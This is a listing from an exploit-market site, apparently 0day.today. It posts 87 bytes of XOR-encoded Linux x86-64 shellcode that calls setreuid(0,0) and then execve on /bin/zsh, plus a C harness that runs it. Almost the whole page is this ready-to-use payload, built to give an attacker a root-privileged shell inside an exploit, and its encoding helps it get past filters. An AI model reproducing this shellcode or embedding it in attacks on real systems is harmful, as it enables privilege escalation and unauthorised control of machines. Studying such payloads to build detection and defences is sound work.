[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Linux/x86-64 - setreuid(0,0) + execve(/bin/zsh, [/bin/zsh, NULL]) + XOR Encoded Shellcode (87 bytes)

Author
egeektronic
Risk
[
Security Risk High
]
0day-ID
0day-ID-29505
Category
shellcode
Date add
15-01-2018
Platform
linux/x86-64
# Title: Linux x86-64 setreuid (0,0) & execve("/bin/zsh", ["/bin/zsh", NULL]) + XOR encoded - 87 bytes
# Author: egeektronic <info (at) egeektronic {dot} com>
# Twitter: @egeektronic
# Tested on: Slackware 13.37
# Thanks: Mark Loiseau, entropy [at] phiral.net and metasm developer
 
unsigned char shellcode[] = 
"\x4d\x31\xc0\x41\xb1\x3c\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb"
"\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48"
"\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\x74\x0d\xfc\x74\xbf\xfc"
"\x4d\x74\x0d\xc3\x74\x0d\xca\x33\x39\xd7\x2e\x74\x0d\xfc\x74"
"\xbf\xfc\x07\x63\x74\x0d\xee\x6e\x6b\x74\xb5\xda\x33\x39\xd4"
"\xd5\xc3\xc3\xc3\x13\x5e\x55\x52\x13\x46\x4f\x54";                                     
int main(void) { ((void (*)())shellcode)(); }

#  0day.today [2024-12-24]  #